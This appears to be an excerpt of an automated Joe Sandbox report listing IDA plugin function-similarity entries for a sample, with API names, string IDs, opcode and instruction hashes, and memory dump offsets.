                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2558813199-1018135373
                                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction ID: 8bd6009f7bf96ea62fa626ce2df698e884a245d92e392a51b5730d4c27182396
                                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction Fuzzy Hash: D4512C36619A4196D660EF56F44027D77A4FB89FA0F1005B6EB8D07B66DF38E4A1CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: U
                                      • API String ID: 442123175-4171548499
                                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction ID: 032b19efae7ca6458eac62b0c4724e85dece1cafd0bff55e8d8587d6afa13254
                                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction Fuzzy Hash: CE41B462B19A4181DB30CF66F4453B967A0FB98BA4F404072EE4E877A4DF3CD451C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID: csm
                                      • API String ID: 3997070919-1018135373
                                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                      APIs
                                        • Part of subcall function 00007FFE1A483A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A483A63
                                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A490993
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CheckCommonHandler__except_validate_context_record
                                      • String ID: csm$f
                                      • API String ID: 1543384424-629598281
                                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction ID: 4c461cacac10900d7d8fe7c9c5e224ccc01df67bc21cbe347de05716ab22586c
                                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction Fuzzy Hash: DE11B432B14B9585E7209F53E4412797764EB89FE4F0880B6EE8907B66CE38E8B1C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-484248852
                                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A48112F), ref: 00007FFE1A4839E0
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A48112F), ref: 00007FFE1A483A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction ID: 262fdb19f6bbc1e68622a29d82ffc98e3acb9bcd807eb8cb95694b368b0688cc
                                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction Fuzzy Hash: 8511EC32619F4182EB618B16F44026977E5FB88FA4F5842B5EE8D07768DF3CD5618B00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-3336177065
                                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710